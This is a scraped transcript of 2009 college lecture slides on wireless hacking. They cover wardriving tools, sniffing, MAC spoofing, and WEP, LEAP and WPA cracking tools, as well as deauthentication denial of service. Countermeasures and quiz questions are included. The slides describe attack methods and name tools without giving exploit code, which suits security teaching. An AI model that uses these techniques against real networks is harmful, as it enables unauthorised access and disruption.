Chapter 8 Wireless Hacking Last modified 3-27-09.
-
Upload
pierce-craig -
Category
Documents
-
view
228 -
download
1
Transcript of Chapter 8 Wireless Hacking Last modified 3-27-09.
Chapter 8Chapter 8
Wireless Hacking Wireless Hacking
Last modified 3-27-09
Equipment Equipment
Windows x. LinuxWindows x. Linux
WindowsWindows– Wireless NIC drivers are easy to getWireless NIC drivers are easy to get– Wireless hacking tools are few and weakWireless hacking tools are few and weak
Unless you pay for AirPcap devices (link Ch 819) Unless you pay for AirPcap devices (link Ch 819) or OmniPeekor OmniPeek
Linux Linux – Wireless NIC drivers are hard to get and Wireless NIC drivers are hard to get and
installinstall– Wireless hacking tools are much betterWireless hacking tools are much better
OmniPeekOmniPeek
WildPackets now packages AiroPeek & WildPackets now packages AiroPeek & EtherPeek together into OmniPeekEtherPeek together into OmniPeek
A Windows-based sniffer for wireless and A Windows-based sniffer for wireless and wired LANswired LANs
Only supports a few wireless NICsOnly supports a few wireless NICs– See links Ch 801, Ch 802See links Ch 801, Ch 802
Prism2 ChipsetsPrism2 Chipsets
For Linux, the three best chipsets to use For Linux, the three best chipsets to use are Orinoco, Prism2.x/3, and Ciscoare Orinoco, Prism2.x/3, and Cisco– Links Ch 803, 804, 805Links Ch 803, 804, 805
AntennasAntennas
Omnidirectional Omnidirectional antenna sends and antenna sends and receives in all receives in all directionsdirections
Directional antennas Directional antennas focus the waves in focus the waves in one directionone direction– The Cantenna shown The Cantenna shown
is a directional antennais a directional antenna
Stacked AntennasStacked Antennas
Quad stacked antenna Quad stacked antenna – Four omnidirectional antennas Four omnidirectional antennas
combined to focus the beam away combined to focus the beam away from the verticalfrom the vertical
– Beamwidth: 360° Horizontal, 15° Beamwidth: 360° Horizontal, 15° VerticalVertical
– Can go half a mileCan go half a mile– Link Ch 806Link Ch 806
WISPerWISPer
Uses "multi-polarization" Uses "multi-polarization" to send through trees to send through trees and other obsctructionsand other obsctructions– Link Ch 807Link Ch 807
Global Positioning System (GPS)Global Positioning System (GPS)
Locates you using signals Locates you using signals from a set of satellitesfrom a set of satellites
Works with war-driving Works with war-driving software to create a map of software to create a map of access pointsaccess points– Link Ch 808Link Ch 808
Pinpoint your Location with Wi-FiPinpoint your Location with Wi-Fi(not in book)(not in book)
Skyhook uses Skyhook uses wardriving to make a wardriving to make a database with the database with the location of many Wi-Fi location of many Wi-Fi access points access points Can locate any Can locate any portable Wi-Fi deviceportable Wi-Fi deviceAn alternative to GPSAn alternative to GPS– Link Ch 809 Link Ch 809
iPhoneiPhone
The iPhone combines GPS, Wi-Fi, and cell The iPhone combines GPS, Wi-Fi, and cell tower location technology to locate youtower location technology to locate you– Link Ch 820Link Ch 820
You can wardrive with the Android phone You can wardrive with the Android phone and Wifiscanand Wifiscan– Links Ch 821-823Links Ch 821-823
War-Driving Software War-Driving Software
TermsTerms
Service Set Identifier Service Set Identifier (SSID)(SSID)– An identifier to distinguish An identifier to distinguish
one access point from one access point from another another
Initialization Vector (IV)Initialization Vector (IV)– Part of a Wired Equivalent Part of a Wired Equivalent
Privacy (WEP) packetPrivacy (WEP) packet– Used in combination with Used in combination with
the shared secret key to the shared secret key to cipher the packet's data cipher the packet's data
NetStumbler NetStumbler
Very popular Windows-based war-driving Very popular Windows-based war-driving applicationapplicationAnalyzes the 802.11 header and IV fields Analyzes the 802.11 header and IV fields of the wireless packet to find:of the wireless packet to find:– SSIDSSID– MAC addressMAC address– WEP usage and WEP key length (40 or 128 WEP usage and WEP key length (40 or 128
bit)bit)– Signal rangeSignal range– Access point vendor Access point vendor
How NetStumbler WorksHow NetStumbler Works
NetStumbler broadcasts 802.11 Probe NetStumbler broadcasts 802.11 Probe RequestsRequestsAll access points in the area send 802.11 All access points in the area send 802.11 Probe Responses containing network Probe Responses containing network configuration information, such as their configuration information, such as their SSID and WEP statusSSID and WEP statusIt also uses a GPS to mark the positions of It also uses a GPS to mark the positions of networks it findsnetworks it finds– Link Ch 810Link Ch 810
NetStumbler ScreenNetStumbler Screen
NetStumbler Countermeasures NetStumbler Countermeasures
NetStumbler's relies on the Broadcast NetStumbler's relies on the Broadcast Probe RequestProbe Request
Wireless equipment vendors will usually Wireless equipment vendors will usually offer an option to disable this 802.11 offer an option to disable this 802.11 feature, which effectively blinds feature, which effectively blinds NetStumbler NetStumbler – But it doesn't blind KismetBut it doesn't blind Kismet
KismetKismet
Linux and BSD-based wireless sniffer Linux and BSD-based wireless sniffer
Allows you to track wireless access points and Allows you to track wireless access points and their GPS locations like NetStumblertheir GPS locations like NetStumbler
Sniffs for 802.11 packets, such as Beacons and Sniffs for 802.11 packets, such as Beacons and Association RequestsAssociation Requests– Gathers IP addresses and Cisco Discovery Protocol Gathers IP addresses and Cisco Discovery Protocol
(CDP) names when it can (CDP) names when it can
Kismet Countermeasures Kismet Countermeasures – There's not much you can do to stop Kismet from There's not much you can do to stop Kismet from
finding your networkfinding your network
Kismet FeaturesKismet Features
Windows version Windows version – Runs on cygwin, only supports two types of Runs on cygwin, only supports two types of
network cardsnetwork cards
Airsnort compatible weak-iv packet loggingAirsnort compatible weak-iv packet logging
Runtime decoding of WEP packets for Runtime decoding of WEP packets for known networks known networks
Kismet ScreenshotKismet Screenshot
For Kismet, see link Ch 811For Kismet, see link Ch 811
Kismet DemoKismet Demo
– Use the Linksys WUSB54G ver 4 nicsUse the Linksys WUSB54G ver 4 nics– Boot from the Backtrack 2 CDBoot from the Backtrack 2 CD– Start, Backtrack, Radio Network Analysis, Start, Backtrack, Radio Network Analysis,
80211, All, Kismet80211, All, Kismet
WardrivingWardriving
Finding Wireless networks with a portable Finding Wireless networks with a portable devicedevice– Image from Image from
overdrawnoverdrawn.net.net
VistumblerVistumbler
Link Ch 818Link Ch 818
CainCain
WiGLEWiGLE
Collects wardriving data from usersCollects wardriving data from users
Has over 16 million recordsHas over 16 million records– Link Ch 825Link Ch 825
Wireless Scanning and Wireless Scanning and Enumeration Enumeration
Goal of Scanning and EnumerationGoal of Scanning and Enumeration– To determine a method to gain system access To determine a method to gain system access
For wireless networks, scanning and For wireless networks, scanning and enumeration are combined, and happen enumeration are combined, and happen simultaneously simultaneously
Wireless SniffersWireless Sniffers
Not really any different from wired sniffersNot really any different from wired sniffers
There are the usual issues with drivers, There are the usual issues with drivers, and getting a card into monitor modeand getting a card into monitor mode
Wireshark WiFi DemoWireshark WiFi Demo
– Use the Linksys WUSB54G ver 4 nicsUse the Linksys WUSB54G ver 4 nics– Boot from the Backtrack 2 CDBoot from the Backtrack 2 CD– In Konsole:In Konsole:
ifconfig rausb0 upifconfig rausb0 up
iwconfig rausb0 mode monitoriwconfig rausb0 mode monitor
wiresharkwireshark
iClicker Questions
Which antenna sends power most tightly focused in a single direction?
A
D
C
B
1 of 3
Which tool runs only on Linux?
A.NetStumblerB.KismetC.VistumblerD.CainE.Wireshark
2 of 3
Which tool gives you the most complete information about every Wi-Fi frame sent?
A.NetStumblerB.KismetC.VistumblerD.CainE.Wireshark
3 of 3
Identifying Wireless Network Identifying Wireless Network DefensesDefenses
SSID SSID
SSID can be found from any of these framesSSID can be found from any of these frames– BeaconsBeacons
Sent continually by the access point (unless disabled)Sent continually by the access point (unless disabled)
– Probe RequestsProbe Requests Sent by client systems wishing to connectSent by client systems wishing to connect
– Probe ResponsesProbe ResponsesResponse to a Probe RequestResponse to a Probe Request
– Association and Reassociation RequestsAssociation and Reassociation RequestsMade by the client when joining or rejoining the networkMade by the client when joining or rejoining the network
If SSID broadcasting is off, just send If SSID broadcasting is off, just send adeauthentication frame to force a reassociationadeauthentication frame to force a reassociation
MAC Access ControlMAC Access Control
CCSF uses this techniqueCCSF uses this technique
Each MAC must be entered into the list of Each MAC must be entered into the list of approved addressesapproved addresses
High administrative effort, low securityHigh administrative effort, low security
Attacker can just sniff MACs from clients Attacker can just sniff MACs from clients and spoof themand spoof them
Gaining Access Gaining Access (Hacking 802.11)(Hacking 802.11)
Specifying the SSIDSpecifying the SSID
In Windows, just select it from the In Windows, just select it from the available wireless networksavailable wireless networks– In Vista, right-click the network icon in the taskbar tray In Vista, right-click the network icon in the taskbar tray
and click "Connect to a Network"and click "Connect to a Network"– If the SSID is hidden, click "Set up a connection or If the SSID is hidden, click "Set up a connection or
network" and then click "Manually connect to a network" and then click "Manually connect to a wireless network"wireless network"
Changing your MACChanging your MAC
Bwmachak changes a NIC under Windows Bwmachak changes a NIC under Windows for Orinoco cardsfor Orinoco cards
SMAC is SMAC is easy easy
link Ch 812link Ch 812
Device ManagerDevice Manager
Many Wi-Fi Many Wi-Fi cards allow cards allow you to you to change the change the MAC in MAC in Windows' Windows' Device Device ManagerManager
Attacks Against the WEP Algorithm Attacks Against the WEP Algorithm
Brute-force keyspace – takes weeks even Brute-force keyspace – takes weeks even for 40-bit keysfor 40-bit keys
Collect Initialization Vectors, which are Collect Initialization Vectors, which are sent in the clear, and correlate them with sent in the clear, and correlate them with the first encrypted bytethe first encrypted byte– This makes the brute-force process much This makes the brute-force process much
fasterfaster
Tools that Exploit WEP Tools that Exploit WEP Weaknesses Weaknesses
AirSnort AirSnort
WLAN-Tools WLAN-Tools
DWEPCrack DWEPCrack
WEPAttack WEPAttack – Cracks using the weak IV flawCracks using the weak IV flaw
Best countermeasure – use WPABest countermeasure – use WPA
HotSpotterHotSpotter
Hotspotter--Like SSLstrip, it silently Hotspotter--Like SSLstrip, it silently replaces a secure WiFi connection with an replaces a secure WiFi connection with an insecure oneinsecure one
Works because Windows allows it, Works because Windows allows it, apparently happy to accept an insecure apparently happy to accept an insecure network as part of the same WLANnetwork as part of the same WLAN– Link Ch 824Link Ch 824
Lightweight Extensible Lightweight Extensible Authentication Protocol (LEAP)Authentication Protocol (LEAP)
What is LEAP?What is LEAP?
A proprietary protocol from Cisco Systems A proprietary protocol from Cisco Systems developed in 2000 to address the security developed in 2000 to address the security weaknesses common in WEP weaknesses common in WEP
LEAP is an 802.1X schema using a LEAP is an 802.1X schema using a RADIUS serverRADIUS server
As of 2004, 46% of IT executives in the As of 2004, 46% of IT executives in the enterprise said that they used LEAP in their enterprise said that they used LEAP in their organizations organizations
The Weakness of LEAPThe Weakness of LEAP
LEAP is fundamentally weak because it LEAP is fundamentally weak because it provides zero resistance to offline provides zero resistance to offline dictionary attacksdictionary attacks
It solely relies on MS-CHAPv2 (Microsoft It solely relies on MS-CHAPv2 (Microsoft Challenge Handshake Authentication Challenge Handshake Authentication Protocol version 2) to protect the user Protocol version 2) to protect the user credentials used for Wireless LAN credentials used for Wireless LAN authentication authentication
MS-CHAPv2MS-CHAPv2
MS-CHAPv2 is notoriously weak becauseMS-CHAPv2 is notoriously weak because– It does not use a SALT in its NT hashesIt does not use a SALT in its NT hashes– Uses a weak 2 byte DES keyUses a weak 2 byte DES key– Sends usernames in clear textSends usernames in clear text
Because of this, offline dictionary and brute Because of this, offline dictionary and brute force attacks can be made much more efficient force attacks can be made much more efficient by a very large (4 gigabytes) database of likely by a very large (4 gigabytes) database of likely passwords with pre-calculated hashes passwords with pre-calculated hashes – Rainbow tablesRainbow tables
Cisco's DefenseCisco's Defense
LEAP is secure if the passwords are long and LEAP is secure if the passwords are long and complexcomplex– 10 characters long with random upper case, lower 10 characters long with random upper case, lower
case, numeric, and special characters case, numeric, and special characters
The vast majority of passwords in most The vast majority of passwords in most organizations do not meet these stringent organizations do not meet these stringent requirementsrequirements– Can be cracked in a few days or even a few minutes Can be cracked in a few days or even a few minutes
For more info about LEAP, see link Ch 813For more info about LEAP, see link Ch 813
LEAP Attacks LEAP Attacks
Anwrap Anwrap
Performs a dictionary attack on LEAPPerforms a dictionary attack on LEAP
Written in Perl, easy to useWritten in Perl, easy to use
AsleapAsleap
Grabs and decrypts weak LEAP Grabs and decrypts weak LEAP passwords from Cisco wireless access passwords from Cisco wireless access points and corresponding wireless cards points and corresponding wireless cards
Integrated with Air-Jack to knock Integrated with Air-Jack to knock authenticated wireless users off targeted authenticated wireless users off targeted wireless networks wireless networks – When the user reauthenticates, their When the user reauthenticates, their
password will be sniffed and cracked with password will be sniffed and cracked with Asleap Asleap
Countermeasures for LEAPCountermeasures for LEAP
Enforce strong passwordsEnforce strong passwords
Continuously audit the services to make Continuously audit the services to make sure people don't use poor passwordssure people don't use poor passwords
WPAWPA
WPA is strongWPA is strong
No major weaknessesNo major weaknesses
However, if you use a weak Pre-Shared However, if you use a weak Pre-Shared Key, it can be found with a dictionary Key, it can be found with a dictionary attackattack
Tool: Aircrack-ngTool: Aircrack-ng
Denial of Service (DoS) Attacks Denial of Service (DoS) Attacks
Radio InterferenceRadio Interference– 802.11a, 11b, and 11g all use the 2.4-2.5GHz 802.11a, 11b, and 11g all use the 2.4-2.5GHz
ISM band, which is extremely crowded at the ISM band, which is extremely crowded at the moment moment
Unauthenticated Management FramesUnauthenticated Management Frames– An attacker can spoof a deaauthentication An attacker can spoof a deaauthentication
frame that looks like it came from the access frame that looks like it came from the access pointpoint
– wlan_jack in the Air-Jack suite does thiswlan_jack in the Air-Jack suite does this
iClicker Questions
Which Cisco proprietary wireless security protocol is vulnerable, but still widely used?
A. WPA2B. WPAC. LEAPD. WEPE. MAC Address Filtering
1 of 4
Which wireless security protocol is the weakest, vulnerable to a trivial sniffing attack?
A. WPA2B. WPAC. LEAPD. WEPE. MAC Address Filtering
2 of 4
Which wireless security protocol is vulnerable to DoS via deauthentication frame injection?
A. WPA2B. WPAC. LEAPD. WEPE. All of the above
3 of 4
Which wireless security protocol requires the most administrative effort to implement and maintain?
A. WPA2B. WPAC. LEAPD. WEPE. MAC Address Filtering
4 of 4